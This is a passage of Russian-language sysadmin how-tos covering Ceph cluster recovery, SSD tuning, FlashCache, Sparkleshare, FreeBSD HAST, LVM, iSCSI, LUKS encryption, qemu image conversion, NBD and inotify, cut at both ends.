16=0.0%, 32=0.0%, 64=0.0%, >=64=0.0% complete : 0=0.0%, 4=100.0%, 8=0.0%, 16=0.0%, 32=0.0%, 64=0.0%, >=64=0.1% issued rwt: total=0,592666,0, short=0,0,0, dropped=0,0,0 latency : target=0, window=0, percentile=100.00%, depth=128 Run status group 0 (all jobs): WRITE: bw=77.2MiB/s (80.9MB/s), 77.2MiB/s-77.2MiB/s (80.9MB/s-80.9MB/s), io=2315MiB (2428MB), run=30006-30006msec Disk stats (read/write): rbd0: ios=0/589859, merge=0/0, ticks=0/3725372, in_queue=3594988, util=100.00% также любезный Себастьян написал красивые вещи:
https://www.sebastien-han.fr/blog/2012/08/26/ceph-benchmarks/
https://www.sebastien-han.fr/blog/2013/10/03/quick-analysis-of-the-ceph-io-layer/ Кластер нужен на запись, поэтому основные тесты на запись. Остался доволен и отдал для теста заказчику Утром след дня заказчик заявил, что я неверно все сделал!!! ???????!!!!!! захожу и вижу cluster: id: 6dae468a-ac29-4cc6-a3e1-7b2a7247eb5b health: HEALTH_ERR 6 osds down 1 host (6 osds) down 5 scrub errors Possible data damage: 4 pgs inconsistent Degraded data redundancy: 2423/4847 objects degraded (50.000%), 2560 pgs degraded, 2560 pgs undersized clock skew detected on mon.mon03 1/3 mons down, quorum mon01,mon03 services: mon: 3 daemons, quorum mon01,mon03, out of quorum: mon02 mgr: mgr02(active), standbys: mgr03, mgr01 osd: 12 osds: 6 up, 12 in ceph health detail HEALTH_ERR 5 scrub errors; Possible data damage: 4 pgs inconsistent OSD_SCRUB_ERRORS 5 scrub errors PG_DAMAGED Possible data damage: 4 pgs inconsistent pg 1.14 is active+clean+inconsistent, acting [12,34] pg 1.27b is active+clean+inconsistent, acting [46,20] pg 1.683 is active+clean+inconsistent, acting [20,34] pg 1.728 is active+clean+inconsistent, acting [49,6] ну ладно попробуем восстановить root@ceph-deploy:~# ceph pg repair 1.728 instructing pg 1.728 on osd.4 to repair .................. instructing pg 1.14 on osd.2 to repair Тем временем задаю вопросы. Выяснилось, заказчик взял и переставил 2 ssd и 2 HDD с другого сервера, а затем отключил 1 OSD. Вспомнив, что на SSD журналы слал думать что можно сделать. Заодно спросил чем 3-й монитор не угодил? На что получил ответ, что все это для теста и нужно проверить все. Так похоже что FileStore мало подходит Пробуем с Blustore Blustore оказался более пригоден и более живуч для исправления ошибок написал скрипт cat /root/rep.sh #!/bin/sh /usr/bin/ceph health detail | grep active+clean+inconsistent | awk '{ print $2 }' | while read a; do /usr/bin/ceph pg repair $a ; done который стартую по крону */10 * * * * /root/rep.sh

Оптимизация работы на SSD-накопителе рабочей станции с Fedora Linux (доп. ссылка 1) [комментарии]

Включаем для SSD-накопителя поддержку TRIM и отключаем обновление метаданных со временем доступа к файлу. Добавляем в список флагов /etc/fstab опции discard и noatime: /dev/mapper/fedora-root / ext4 noatime,discard 1 1 /dev/mapper/fedora-home /home ext4 noatime,discard 1 2 Организуем хранение содержимого временной директории в памяти, в /etc/fstab включаем tmpfs для /tmp: none /tmp tmpfs nodev,nosuid,mode=1777 0 0 По аналогии можно создать хранимый в памяти раздел и для логов. Содержимое логов будет сбрасываться при перезагрузке, но для десктоп-систем потеря логов, как правило, не критична. none /var/log tmpfs size=20m 0 0 Отключаем кэширование страниц Firefox на диске. В about:config меняем содержимое переменной browser.cache.disk.enable на false и указываем приемлемый размер кэша в ОЗУ через переменную browser.cache.memory.capacity (65536 для 64 Мб). Включаем режим обратного кэширования записи для SSD-диска (дополнительно кэширование следует включить в BIOS ноутбука) и заменяем планировщик ввода/вывода на вариант, оптимизированный для Flash-памяти. Устанавливаем утилиту hdparm: sudo yum install hdparm Создаём файл /etc/rc.local и прописываем в него: #!/bin/sh hdparm -W1 /dev/sda echo noop > /sys/block/sdb/queue/scheduler где, /dev/sda - SSD-накопитель. sudo chmod +x /etc/rc.local Активируем сервис для запуска /etc/rc.local в systemd: systemctl enable rc-local.service

Перенос данных через loop-диск, физически занимающий не больше размера скопированных данных (доп. ссылка 1) Автор: Паша [комментарии]

У меня на роутере с линуксом висят 3 флешки, объединенные в один длинный диск через линейный программный RAID. Возникла необходимость заменить одну из этих флешек, ничего умнее не придумал, как на ноутбуке скопировать всю информацию из старого массива в новый, через диск внутри файла, подключенный как loop device. Но мне было лениво создавать loop-диск в 30 ГБ, поскольку это долго - скорость записи на диск не большая, а 30 ГБ это много. Поискал информацию про диски размером в одну дырку, и вот нашел вот этот чудесный пост. У меня стоит ubuntu 12.04, через консоль перешел на диск от Windows 7 с ntfs: cd /media/Data Создаем диск в 30ГБ размером в одну дырку dd if=/dev/zero of=disk.image bs=1M seek=30000 count=1 Проверьте сейчас сколько он у вас занимает, через du -h disk.image Форматируем диск: losetup /dev/loop0 disk.image mke2fs /dev/loop0 После предыдущего шага "du -h disk.image" показал у меня 460 МБ Монтируем и заливаем на диск информацию - и файл с диском растет на разделе в процессе загрузки данных mount /dev/loop0 /mnt/where/you/need

Использование Google Drive в Linux [комментарии]

Как известно, компания Google пока не выпустила официального клиента Google Drive для платформы Linux, но подтвердила, что работает над его созданием. Не дожидаясь выхода Linux-клиента от Google энтузиастами было создано несколько независимых открытых проектов для работы с данным сервисом хранения, используя публично доступную спецификацию по API для работы с Google Drive. Среди такие проектов: Grive - написанный на С++ клиент для работы с Google Drive. Поддерживает две базовые операции: загрузка всех находящиеся в Google Drive файлов в текущую локальную директорию и сохранение в Google Drive изменённых данных из локальной директории. В настоящий момент (версия 0.0.3) программа поддерживает только обратную синхронизацию изменений, новые файлы в Google Drive она загружать пока не может. Готовые пакеты сформированы для Debian Testing и Fedora Linux. При первом запуске утилиту следует запустить с опцией "-a", затем открыть указанные URL и скопировать код аутентификции в приглашение программы, после этого будет создана директория .grive и начнётся загрузка данных. google-docs-fs - написанная на языке Python реализация FUSE-модуля для монтирования Google Docs (будет работать и для Google Drive) в качестве локальной файловой системы. К сожалению автор прекратил развитие проекта, но успел выпустить кандидат в релизы. Модуль поддерживает все базовые операции, по чтению и записи данных, позволяет создавать директории. Готовые пакеты доступны для Ubuntu и Arch Linux. Для монтирования директории после установки следует запустить "gmount локальная_директория адрес@gmail.com", для размонтирования - "gumount локальная_директория". gdocsfs - FUSE-модуль для Google Docs, написанный на Java. fuse-google-drive - FUSE-модуль для монтирования содержимого Google Drive в качестве локальной файловой системы. Проект написан на языке Си. В настоящее время проект находится на начальной стадии развития и позволяет только просматривать список файлов, размещённых в Google Drive. google-drive-utils - попытка написать на Python набор утилит для работы с Google Drive, создаваемых по аналогии с GNU Coreutils (ls, cat, cp, mv и т.п.). Проект пока находится на стадии формирования начального тестового прототипа и ещё не пригоден к использованию.

Использование FlashCache для кэширования обращений к диску на высокоскоростном SSD-накопителе (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Весной 2010 года компания Facebook открыла код проекта FlashCache, представляющего собой модуль для ядра Linux, позволяющий заметно ускорить работу MySQL и других интенсивно работающих с диском приложений. Увеличение производительности достигается за счет организации процесса прозрачного кэширования наиболее активно используемых данных на быстрых SSD-накопителях. С точки зрения организации работы ничего не меняется, добавляется новое блочное устройство, которое при чтении выдает данные из быстрого кэша, а при записи дублирует их в кэше и на диске, обеспечивая прежний уровень надежности. Поддерживается также менее надежный режим увеличения скорости записи, при котором сначала осуществляется запись на хранилище SSD, а затем в фоне производится синхронизация данных на обычное хранилище. Поддерживаются функции зеркалирования кэша на несколько SSD-накопителей и задействование команды ATA TRIM для более оптимального распределения данных по SSD. Установка. Устанавливаем сопутствующие пакеты для Debian/Ubuntu: $ apt-get install git-core dkms build-essential linux-headers-`uname -r` Для CentOS/RHEL подключаем репозитории EPEL и репозиторий SRPMS. Устанавливаем необходимые пакеты: $ yum install dkms gcc make yum-utils kernel-devel Так как для сборки FlashCache требуются некоторые внутренние заголовочные файлы, которые не входят в состав пакета kernel-headers/devel требуется загрузить и установить полный код ядра: $ yumdownloader --source kernel-`uname -r` $ sudo rpm -ivh kernel-`uname -r`.src.rpm Загружаем исходные тексты FlashCache: $ git clone https://github.com/facebook/flashcache.git Работа FlashCache протестирована с ядрами Linux с 2.6.18 по 2.6.38, для более новых ядер могут наблюдаться проблемы. Собираем модуль с использованием DKMS (Dynamic Kernel Module Support): $ cd flashcache $ sudo make -f Makefile.dkms install -o root -g root -m 0755 -d /var/lib/dkms/flashcache/1.0-101-g4bceda86d13d/source rsync -r src/ /var/lib/dkms/flashcache/1.0-101-g4bceda86d13d/source/ sed "s/PACKAGE_VERSION=/PACKAGE_VERSION=1.0-101-g4bceda86d13d/" src/dkms.conf > "/var/lib/dkms/flashcache/1.0-101-g4bceda86d13d/source/dkms.conf" dkms build -m flashcache -v 1.0-101-g4bceda86d13d Kernel preparation unnecessary for this kernel. Skipping... Building module: cleaning build area.... KERNEL_TREE=/lib/modules/2.6.32-33-generic/build make modules....... cleaning build area.... DKMS: build Completed. make -C src/utils install ... install -d -m 755 /sbin/ install -m 755 flashcache_create flashcache_destroy flashcache_load /sbin/ make[1]: Выход из каталога `/home2/home/mc/soft/flashcache/flashcache/src/utils' dkms install -m flashcache -v 1.0-101-g4bceda86d13d flashcache.ko: Running module version sanity check. - Original module - No original module exists within this kernel - Installation - Installing to /lib/modules/2.6.32-33-generic/updates/dkms/ depmod......... Updating initrd Making new initrd as /boot/initrd.img-2.6.32-33-generic (If next boot fails, revert to the .bak initrd image) update-initramfs.... все, теперь модуль flashcache.ko установлен и готов к использованию. Режимы кэширования Поддерживается три режима кэширования: Writethrough - самый надежный режим, при котором все операции записи сразу переносятся на диск и сохраняются на SSD. Кэшируются только операции записи. При перезагрузке или при отключении накопителя содержимое кэша не теряется и может быть использовано сразу, без траты дополнительного времени на его заполнение. Writearound - надежный режим, при котором данные при выполнении операции записи сохраняются только на диск и не отражаются на SSD. Кэш на SSD-накопителе обновляется только на основании выполнения операций чтения с диска (кэшируются только операции чтения). Режим подходит в ситуации, когда запись на диск производится быстрее, чем на SSD. После перезагрузки или отключения накопителя кэш начинает заполняться с нуля. Writeback - наиболее быстрый, но менее надежный режим. Данные вначале записываются на SSD, а потом в фоне перекидываются на диск. Кэшируются как операции записи, так и чтения. При экстренном отключении питания не исключено пропадание не синхронизированных на диск данных. Использование Для управления FlashCache подготовлены три утилиты: flashcache_create - создание нового дискового раздела с кэшированием; flashcache_load - подключение ранее созданного раздела с кэшем в режиме writeback; flashcache_destroy - очистка содержимого кэша, созданного в режиме writeback. Для режимов writethrough и writebehind утилиты flashcache_load и flashcache_destroy не требуются, так как кэш очищается при переподключении раздела. Предположим, что в системе имеется жесткий диск /dev/sdb и быстрый SSD-накопитель /dev/sdc. Для организации кэширования в режиме writeback, с размером блока 4 Кб и общим размером кэша 1 Гб следует выполнить: flashcache_create -p writeback -s 1g -b 4k cachedev /dev/sdc /dev/sdb После выполнения этой команды будет создано виртуальное блочное устройство с именем "cachedev", при монтировании раздела через которое будет автоматически использовано кэширование. Для загрузки прошлого содержимого кэши или очистки кэша в режиме writeback можно выполнить команды: flashcache_load /dev/sdc flashcache_destroy /dev/sdc Для удаления и просмотра статистики для уже созданных виртуальных блочных устройств следует использовать утилиту dmsetup. Удаляем устройство cachedev: dmsetup remove cachedev Смотрим статистику: dmsetup status cachedev dmsetup table cachedev или cat /proc/flashcache/cachedev/flashcache_errors cat /proc/flashcache/cachedev/flashcache_stats Для тонкого управления режимами кэширования поддерживается большое число специальных sysctl-вызовов, описание которых можно найти в документации.

Организация файлового хранилища на базе Git-репозитория при помощи Sparkleshare (доп. ссылка 1) [комментарии]

В рамках проекта Sparkleshare развивается свободный движок для организации похожих на Dropbox online-хранилищ, непосредственное хранение данных в которых осуществляется в любом Git-репозитории. Использование Git позволяет задействовать элементы версионного контроля для отслеживания изменений в файлах, давая возможность отследить все изменения и при необходимости вернуться к состоянию определенного файла в прошлом. С технической стороны SparkleShare является Git-клиентом, оптимизированным для хранения и обмена файлами. Программа может использоваться не только для хранения своих файлов, но и для организации обмена файлами с другими людьми или для обеспечения синхронизации данных между домашним и рабочим ПК. SparkleShare поддерживает шифрование хранимых данных, что позволяет использовать публичные Git-репозитории не опасаясь возможной утечки информации. Например, можно использовать Git-репозитории в публичных сервисах Gitorious и GitHub. Рассмотрим процесс развертывания Sparkleshare-хранилища под управлением Fedora Linux с целью организации доступного дома и на работе хранилища. Для организации рабочего процесса создадим в домашней директории каталог Sparkleshare, в котором будем создавать подкаталоги, соответствующие текущим проектам. В качестве первичного хранилища будет использовать Git-репозиторий на собственном сервере, доступ к которому организован через SSH. Одновременно настроим на сервере доступность сохраняемых файлов через web, разместив клон репозитория в директории ~/public_html. Установка Sparkleshare на локальной клиентской машине. Добавляем соответствующий YUM-репозиторий, в котором содержатся готовые пакеты с Sparkleshare: cd /etc/yum.repos.d sudo curl -O http://repos.fedorapeople.org/repos/alexh/sparkleshare/fedora-sparkleshare.repo Устанавливаем Sparkleshare sudo yum install -y sparkleshare ssh-askpass Удаляем пакет nautilus-python, так как иначе при работе Sparkleshare наблюдается крах Nautilus. sudo yum remove -y nautilus-python PS. Пользователи Ubuntu могут загрузить Sparkleshare из PPA-репозитория: sudo add-apt-repository ppa:pdffs/sparkleshare sudo apt-get update sudp apt-get install sparkleshare Настройка Git-репозитория Создаем Git-репозиторий на внешнем сервере, который будет использован в качестве первичного хранилища: git init --bare repo.git Для работы на сервере должны быть установлены пакеты с git и openssh-server. Проводим первичное клонирование репозитория в директорию ~/public_html, чтобы файлы были доступны через web: cd ~/public_html git clone repo.git cd repo Создаем тестовый файл: echo 'Fedora 15 rocks!' >> test.txt Добавляем файл в Git и принимаем изменения. git add test.txt git commit test.txt -m 'initial commit2' Создаем начальную ветку: git push origin master Подключаем свои локальные машины к репозиторию На локальной рабочей машине останавливаем рабочий процесс Sparkleshare и клонируем созданный на прошлом шаге репозиторий sparkleshare stop cd ~/SparkleShare git clone логин@хост:/home/логин/repo.git Проверяем содержимое: cd ~/SparkleShare/repo ls Меняем содержимое тестового файла echo 'Pandas rule.' >> test.txt; Применяем изменения: git commit -a -m 'panda PSA' git push На удаленном сервере, где создан базовый Git-репозиторий принимаем изменения: cd ~/public_html/repo git pull Проверяем, изменилось ли содержимое test.txt: cat test.txt Если все работает нормально, то запускаем на локальной машине Sparkleshare которые возьмет в свои руки выполнение рутинных операций по отслеживанию изменений и синхронизации данных на внешний сервер. sparkleshare start Настраиваем автозапуск Sparkleshare в GNOME: cp /usr/share/applications/sparkleshare.desktop ~/.config/autostart Заходим в директорию с репозиторием SparkleShare cd ~/SparkleShare/repo и создаем там новый тестовый файл: echo '42' >> theanswer.txt На удаленном сервере клонируем репозиторий и убеждаемся, что новый файл автоматически был помещен в Git: cd ~/public_html/repo git pull ls Все работает. Создаем автоматически обновляемое зеркало для просмотра репозитория из web. Настроим автоматическое клонирование репозитория удаленном сервере, с которого будет осуществлена раздача файлов через Web. Для работы нам понадобиться настроить удаленный вход со второй машины на первую по SSH по ключам, без ввода пароля. Инструкцию по настройке можно найти здесь. На удаленном сервере переходим в базовую директорию с Git-репозиторием (не клоном) cd ~/git.repo/hooks Добавляем скрипт, который будет срабатывать при добавлении файлов в репозиторий. В этом скрипте автоматически будет выполнять локальное клонирование репозитория для его видимости в web. Создадим скрипт post-receive в директории ~/git.repo/hooks (не забудьте подставить реальное значение вместо "логин"): #!/bin/sh while read oldrev newrev refname do true done cd /home/user/public_html/repo GIT_DIR=/home/логин/public_html/repo/.git git pull Проверим, создав на локальной системе третий тестовый файл: cd ~/SparkleShare/repo echo 'Fedora 15' >> latestfedora.txt Переходим на удаленном сервере в директорию с клоном репозитория для web и проверяем появился ли новый файл: cd ~/public_html/repo ls Подсказки по настройке работы Sparkleshare c Github и Gitorious можно найти на странице http://sparkleshare.org/help/

Создание отказоустойчивых хранилищ во FreeBSD, при помощи HAST (доп. ссылка 1) Автор: mef [комментарии]

Введение. HAST (Highly Avalible Storage) технология позволяющая создавать отказоустойчивые хранилища (Primary-Secondary) используя несколько машин. Эта технология может помочь при создании кластера высокой доступности (HA). HAST появился в FreeBSD начиная с 8.1. В текущей версии HAST можно использовать только две машины. HAST работает на уровне блоков и не зависит от файловой системы, т.е. можно использовать ZFS или UFS. Эта технология работает по TCP. Для работы используется демон hastd и утилита для управления hastctl. Использование. Имеем две машины (ноды) host1 192.168.1.2 host2 192.168.1.9 на обоих машинах стоит дополнительный диск ad3. HAST готов к использованию сразу, без дополнительных установок. Для конфигурирования создадим файл /etc/hast.conf resource my { on host1 { local /dev/ad3 remote 192.168.1.9 } on host2 { local /dev/ad3 remote 192.168.1.2 } } т.е. host1 имеет диск ad3 и синхронизируется с 192.168.1.9 (host2), а для host2 соответственно наоборот. Сделайте такой же файл на другой машине. host1# hastctl create my host1# hastd После этого демон должен запустится, проверим, что все работает host1# hastctl status должно выдать вроде этого my: role: init provname: my localpath: /dev/ad3 extentsize: 0 keepdirty: 0 remoteaddr: 192.168.1.2 replication: memsync dirty: 0 bytes [/CODE] Сделаем такие же действия на другой ноде host2# hastctl create my host2# hastd [/CODE] Теперь раздадим роли машинам. Например, host1 будет главным, а host2 - резервным. host1# hastctl role primary my host2# hastctl role secondary my После того, как host2 стал secondary, должна начаться синхронизация. В первый раз она не должна занять много времени. Проверим, что все работает. host1# hastctl status my: role: primary provname: my localpath: /dev/ad3 extentsize: 2097152 keepdirty: 0 remoteaddr: 192.168.1.9 replication: memsync status: complete dirty: 0 bytes Для нас важно, чтобы был статус complete. Если статус другой, проверяем, что не так. Теперь создадим файловую систему. Не смотря на то что можно использовать UFS лучше использовать ZFS, чтобы не приходилось запускать fsck. Создадим пул используя появившееся устройство /dev/hast/my host1# zpool create mydisk /dev/hast/my host1# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT mydisk 95G 84.5K 95G 0% ONLINE - На второй машине этого делать не надо. HAST настроен. Тестирование. Создадим несколько файлов в mydisk и протестируем нашу систему. Для тестирования перезагрузим ноду с primary, т.е. host1. После перезагрузки посмотрим состяние пула host1# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT mydisk - - - - FAULTED - Это случилось потому что пропало устройство /dev/hast/my Экспортируем пул и поменяем роль host1 на secondary host1# zpool export -f my host1# hastctl role secondary my А host2 сделаем основным и импортируем пул. host2# hastctl role primary my host2# zpool import -f mydisk host2# zpool list NAME SIZE USED AVAIL CAP HEALTH ALTROOT mydisk 95G 84.5K 95G 0% ONLINE - Проверим наши файлы, они должны остаться. Ошибки. По умолчанию логи можно посмотреть в /var/log/message. В результате некоторых действий можно добиться ситуации, когда вы обнаружите в логах запись Split brain - разделение сознания. Это означает, что каждая из нод думает, что она главная и живет собственной жизнью. Такое может произойти если вы умудритесь записать разную информацию на нодах или поставить обои машины в роль primary. Исправить эту ситуацию можно выбрав ту машину которая будет у вас secondary, и нужно сделать на ней: hastctl role init my hastctl create my hastctl role secondary my После этого должен запуститься процесс синхронизации. Он может занять продолжительное время. Автоматизация. Эта система сделана для кластеризации, а именно для кластера высокой доступности. Например можно воспользоваться CARP чтобы сделать постоянным. Можно написать собственные скрипты, а можно воспользоваться стандартными. Автором HAST уже написаны готовые скрипты которые умеют определять на какой ноде сейчас primary. Для работы следует установить ucarp: cd /usr/ports/net/ucarp make && make install clean && rehash Скрипты находятся в /usr/share/expamles/hast/ Скопируйте их в /домашний каталог/sbin/hastd/ так предлагается по умолчанию и отредактируйте переменные в начале скриптов ucarp.sh, ucarp_down.sh, ucarp_up.sh Сделайте это на обоих нодах и запустите ucarp.sh на обоих нодах. Дополнительные возможности. У HAST существует три типа репликаций. Они различаются тем когда данные считаются записанными. * memsync - Данные операции записи считаются завершенными когда запись локальна завершена и когда удаленный узел принял данные, но до того как записать данные. Данные на удаленной ноде начинают писаться, как только отправлен ответ. * fullsync - Данные операции записи считаются завершенными когда запись завершена локально и на удаленной ноде запись тоже завершена. * async - Данные записи считаются завершенными когда запись завершена локально. Это наиболее быстрый способ записи. На момент написания статьи работает только memsync. Дополнительную информацию можно прочитать на http://wiki.freebsd.org/HAST Заключение. HAST только появился, у него богатые возможности для организации хранилища высокой доступности. В данный момент еще не все работает, но это хорошее начало для кластеризации на FreeBSD. Перед тем как работать с HAST в боевых условиях рекомендую потренироваться. У меня были ситуации, когда secondary не хотел брать данные с primary, было что неаккуратные движения приводили к "Split Brain". Данные, правда, потеряны не были, но много времени было потеряно на синхронизации.

Установка Slackware Linux на LVM Автор: tux2002 [комментарии]

Загрузимся с установочного диска Slackware 13.0 fdisk -l Создадим на диске раздел LVM (тип 8e) Создадим группу томов lvm и логические тома для файловых систем root и home размером по 5GB: pvcreate /dev/sda1 vgcreate lvm /dev/sda1 lvcreate -L5G -n root lvm lvcreate -L5G -n home lvm Теперь можно запускать инсталлятор: setup Установку проводим стандартно. LILO устанавливаем в режиме simple. Если перезагрузить компьютер после установки системы, то ядро загрузится, но корневая файловая система не будет смонтирована, т.к. после загрузки ядра логические тома lvm ещё не активированы. Чтобы решить эту проблему нужно создать initrd и переустановить загрузчик. mount --bind /proc /mnt/proc mount --bind /dev /mnt/dev chroot /mnt cd /boot mkinitrd -c Теперь нужно немного изменить initrd cp /sbin/lvm.static /boot/initrd-tree/sbin/lvm ln -s lvm /boot/initrd-tree/sbin/vgscan ln -s lvm /boot/initrd-tree/sbin/vgchange echo "/dev/mapper/lvm-root" > initrd-tree/rootdev echo "ext4" > initrd-tree/rootfs (Тип файловой системы подставьте свой) mkinitrd Переустановим загрузчик. vi /etc/lilo.conf Секцию image = /boot/vmlinuz root = Linux label = Linux read-only приведем к виду image = /boot/vmlinuz initrd = /boot/initrd.gz root = Linux label = Linux read-only Выполним команды lilo exit reboot

Настройка iSCSI в Ubuntu Linux [комментарии]

Создание iSCSI-хранилища (iSCSI target - сервер): Устанавливаем пакет iscsitarget: sudo apt-get install iscsitarget Настраиваем файл конфигурации /etc/ietd.conf Например, открываем доступ к /dev/sdc диску: Target iqn.2009-04.ru.test:nas1.sdc IncomingUser USER1 PASSWORD1 OutgoingUser USER2 PASSWORD2 Lun 0 Path=/dev/sdb,Type=fileio где IncomingUser - логин/пароль для аутентификации раскрытия сессий для iSCSI initiator. OutgoingUser - для аутентификации target на initiator-е; или вместо раздела создаем хранилище в файле: Target iqn.2009-04.ru.test:nas2.filedb Lun 0 Path=/tmp/file.nas,Type=fileio Файл хранилища /tmp/file.nas размером 1Гб создаем как dd if=/dev/zero of=templun3 count=0 obs=1 seek=1G Перезапускаем iscsitarget: invoke-rc.d iscsitarget restart Подключение созданного хранилища на другой машине (iSCSI initiator - клиент): Устанавливаем iSCSI Initiator: sudo apt-get install open-iscsi Настраиваем файл конфигурации /etc/iscsi/iscsid.conf (или ~/.iscsid.conf): node.startup = automatic node.session.auth.username = USER1 node.session.auth.password = PASSWORD1 discovery.sendtargets.auth.username = USER2 discovery.sendtargets.auth.password = PASSWORD2 где, в node.session.* задается имя пользователя и пароль для CHAP аутентификации initiator в target; discovery.sendtargets.* имя пользователя и пароль для раскрытия сессий. Перезапускаем сервис: invoke-rc.d open-iscsi restart Определяем iscsi target (192.168.1.10 - IP iscsitarget сервера): iscsiadm -m discovery -t sendtargets -p 192.168.1.10 подключаемся к выбранному сервису: iscsiadm --mode node --targetname iqn.2009-04.ru.test:nas2.filedb --portal 192.168.1.10:3260 --login Перезапускаем сервис: invoke-rc.d open-iscsi restart Смотрим имя устройства в /var/log/messages: SCSI device sdd: 20981760 512-byte hdwr sectors (10742 MB) Далее работаем с /dev/sdd как с обычным блочным устройством (форматируем, монтируем и т.п.): fdisk /dev/sdd mke2fs /dev/sdd1 mkdir /iscsi mount /dev/sdd1 /iscsi

Создание шифрованного раздела в Linux (доп. ссылка 1) [комментарии]

В CentOS 5.3 добавлена возможность создания шифрованных дисковых разделов на этапе установки. Рассмотрим ручное создание шифрованного раздела /dev/sdb3 при помощи dm-crypt/LUKS. Сryptsetup можно найти в пакете cryptsetup в репозиториях Debian, Ubuntu, SuSE, Fedora и CentOS: Установка: apt-get install cryptsetup или yum install cryptsetup Заполняем раздел случайными данными, для удаления остаточной информации: dd if=/dev/urandom of=/dev/sdb3 Инициализируем шифрованный раздел cryptsetup luksFormat /dev/sdb3 в ответ на приглашение "Enter LUKS passphrase:" вводим пароль, под которым будет производиться доступ к созданному разделу. Проверяем все ли нормально было создано: cryptsetup isLuks /dev/sdb3 && echo Sucess Sucсess Смотрим параметры созданного раздела: cryptsetup luksDump /dev/sdb3 LUKS header information for /dev/sdb3 Version: 1 Ciper name: aes Cipher mode: cbc-essiv:sha256 Hash spec: sha1 ... Получаем UUID идентификатор раздела для его последующего монтирования без привязки к имени устройства: cryptsetup luksUUID /dev/sdb3 d77eb752-8a90-4d94-ae9f-2bec0a22c5d3 Подключаем шифрованный раздел, для его последующего монтирования: cryptsetup luksOpen /dev/sdb3 db Enter LUKS passphrase: вводим пароль key slot 0 unlocked. Command successful. Смотрим параметры расшифрованного устройства /dev/mapper/db, пригодного для монтирования: dmsetup info db Name: db State: ACTIVE Read Ahead: 256 Tables present: LIVE Open count: 0 Event number: 0 Major, minor: 253, 1 Number of targets: 1 Форматируем новый раздел: mke2fs -j /dev/mapper/db Создаем точку монтирования: mkdir /db Монтируем: mount /dev/mapper/db /db Добавляем настройки в /etc/crypttab в последовательности соответствующей порядку монтирования разделов: luks-d77eb752-8a90-4d94-ae9f-2bec0a22c5d3 UUID=d77eb752-8a90-4d94-ae9f-2bec0a22c5d3 none Добавляем автомонтирование в /etc/fstab (на этапе загрузки нужно будет вводить пароль): /dev/mapper/luks-d77eb752-8a90-4d94-ae9f-2bec0a22c5d3 /db ext3 defaults 0 0 Для автомонтирования шифрованного раздела должен быть активен системный сервис /etc/init.d/crytdisks Для отключения раздела нужно использовать: umount /db crytsetup luksClose /dev/mapper/db Вместо ввода пароля можно сохранить ключ шифрования на USB брелок, последовательность примерно такая: Создаем ключ на flash: dd if=/dev/random of=/media/flash/pass.key bs=1 count=256 Инициализируем раздел: cryptsetup luksFormat /dev/sdb3 /media/flash/pass.key Подключаем раздел: cryptsetup --key-file /media/flash/pass.key luksOpen /dev/sdb3 db В /etc/crypttab вместо "none" добавляем путь к файлу с ключом.

Как преобразовать образ виртуальной машины Qemu в VirtualBox и VmWare [комментарии]

Для преобразования образа виртуальной машины Qemu в вид пригодный для запуска в VirtualBox, можно использовать следующие команды: qemu-img convert qemu.img tmp.bin VBoxManage convertdd tmp.bin virtualbox.vdi VBoxManage modifyvdi virtualbox.vdi compact Для старых версий VirtualBox, нужно было использовать вместо VBoxManage - vditool: vditool DD virtualbox.vdi tmp.bin vditool SHRINK virtualbox.vdi Преобразование qemu образа в формат пригодный для использования в VmWare: qemu-img convert -6 qemu.img -O vmdk vmware.vmdk Для преобразования формата VmWare в qemu: qemu-img convert vmware.vmdk -O qcow2 qemu.img Для преобразования образа диска или livecd в вид пригодный для использования в qemu: qemu-img convert -f raw disk.img -O qcow2 qemu.img qemu-img convert -f cloop cloop.img -O qcow2 qemu.img

Передача блочных устройств на другую машину, при помощи NBD в Linux (доп. ссылка 1) (доп. ссылка 2) [комментарии]

Возможность работы с блочным устройством другой машины по сети может быть оправдана при наличии на второй машине новой версии fsck, поддержки файловой системы (например, тестирование нового драйвера FS, или экспорт на другую программную платформу, диск можно подключить к Windows машине и примонтировать на компьютере с Linux) или специализированного устройства (например, raid-контроллера), отсутствующих на первой машине. NBD также можно использовать в целях упрощения ограничения интенсивности операций ввода/вывода (клиент и сервер одна машина, регулировка через iptables), хранилище можно примонтировать на нескольких машинах в read-only режиме и использовать unionfs для сохранения изменений на локальный диск. Загружаем исходные тексты NBD с сайта http://nbd.sourceforge.net/ или устанавливаем пакеты в Debian/Ubuntu (nbd-server на сервере, nbd-client на клиенте): apt-get install nbd-server apt-get install nbd-client Экспортируем устройство /dev/sdb1 на сервере: nbd-server 2000 /dev/sdb1 или nbd-server 192.168.1.1:2000 /dev/sdb1 -r -l /etc/nbd.allow где, 2000 - номер порта для приема соединений от клиента, для привязки к IP можно использовать "192.168.1.1:2000" Для экспорта в режиме только для чтения нужно указать опцию "-r" Таймаут можно задать через опцию "-a" Через опцию "-l" можно указать файл со списком IP, которым разрешен доступ. Через опцию "-c" можно организовать доступ в режиме фиктивной записи, когда все изменения не будут записываться в экспортируемое устройство, а будут отражаться во временном файле, доступном только для данной сессии. Вместо устройства можно экспортировать содержимое файла: dd if=/dev/zero of=/tmp/test.img count=256 bs=1024k mkfs.ext3 /tmp/test.img nbd-server 2000 /tmp/test.img На стороне клиента выполняем: modprobe nbd nbd-client IP_сервера 2000 /dev/nbd0 Устройство /dev/sdb1 сервера будет доступно через /dev/nbd0 на стороне клиента. Монтируем файловую систему на стороне клиента: mount /dev/nbd0 /mnt

Слежение за изменением файлов и директорий в Linux shell [комментарии]

Пакет inotify-tools содержит две полезные утилиты: inotifywait - ожидать наступления определенного события в файле или дирекотории. inotifywatch - слежение за статистикой изменений и вывод суммарных данных. Утилиту inotifywait удобно использовать в скриптах, например, когда нужно дождаться завершения внешней операции с файлом и мгновенно среагировать на изменения. Напрмер, запустим: inotifywait /tmp При попытке создать файл в /tmp утилита завершит работу, выдав: /tmp/ CREATE,ISDIR v31549 При попытке создать директорию: /tmp/ CREATE,ISDIR 0 Если необходимо следить за изменением во всех директориях в пределах /tmp, следует использовать флаг рекурсивного контроля "-r". Для больших директорий может понадобиться расширить лимит /proc/sys/fs/inotify/max_user_watches. Используя опцию "--fromfile" можно загрузить список контролируемых файлов и директорий из файла. Опция "-e" позволяет реагировать только на определенный тип события, например, на удаление файла, игнорируя создание и открытие. Опция '-m' отменяет мгновенный выход после наступления события, что позволяет организовать визуальное наблюдение или обработку в цикле. Пример, скрипта для обработки изменения файла: #!/bin/sh inotifywait -e delete -m /tmp/lock/ | while read dir events file; do echo "Removed $dir$file" 